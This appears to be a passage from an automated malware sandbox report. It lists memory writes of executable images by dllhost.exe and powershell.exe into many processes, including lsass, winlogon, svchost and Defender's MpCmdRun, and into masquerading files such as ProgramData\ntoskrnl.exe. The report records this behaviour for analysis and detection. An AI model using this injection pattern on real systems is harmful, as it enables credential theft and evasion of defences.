                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2D40000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 880000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: F60000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 26A0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D50000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D00000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2DA0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2EA0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2E90000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2EF0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D60000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2B20000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2DB0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: E10000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D70000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2B70000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: E50000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1590000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 8E0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D40000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: EC0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: CF0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 620000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2990000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 29F0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D70000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2F20000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2D40000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2DC0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 670000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D50000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1470000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 15C0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 11C0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D40000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D10000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2970000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 26A0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 10E0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: A90000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2380000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2BC0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: B90000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 930000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 11D0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 23A0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1150000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D30000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1130000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: B20000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D50000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2A60000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2A20000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D60000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: FB0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 600000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: C80000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1460000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: DC0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 11A0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: E70000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 7B0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2C60000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1290000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 9F0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2230000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2A90000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1170000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2880000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: B00000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 1B7C0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2153E9B0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2C14A960000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1BC83280000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28FAE000000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28FAE2E0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 25C9D520000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 180CBB00000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 180CBB30000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2BC5FFD0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\schtasks.exe base: 1E9DCC60000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\schtasks.exe base: 1E9DCD80000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 25FC3320000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19C14ED0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: unknown base: 1E9DD5F0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WerFault.exe base: 180F6450000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B9973D0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 213A4CC0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 20DF5510000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1FA39650000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1FB8E0E0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\ProgramData\ntoskrnl.exe base: 5D0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\ProgramData\ntoskrnl.exe base: 900000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\ProgramData\ntoskrnl.exe base: 1B0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\ProgramData\ntoskrnl.exe base: 400000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 25A16DF0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 25A16E20000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exe | Memory written: PID: 4084 base: 7F80000 value: 4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 7680
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: C91140A010
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\winlogon.exe base: 2E991720000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\lsass.exe base: 213BDCB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 158709A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dwm.exe base: 26DB1550000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2917C380000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22382770000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1486AD40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 24BD3CA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FA73D30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CD021B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 269B9FD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22054D80000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 27C57DA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A333B40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F174530000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23315740000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A9C8540000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1EC212A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1876D540000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22CD8950000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 15104330000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22308E70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1AB19360000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E731800000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A6DD9B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\spoolsv.exe base: D50000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 209D2560000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FC05190000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D6B1010000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2036E580000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC6C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2480FAC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2671A930000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2C588F90000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A8857C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 174DEDC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 282A2110000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1DA09D90000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 287FBEC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\sihost.exe base: 2537C620000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 29B59750000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 20CAB570000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\explorer.exe base: 7F80000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23014DD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 21744F70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F02ED50000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dllhost.exe base: 1C0F4C90000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A50F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 19985DA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 26D10B60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000
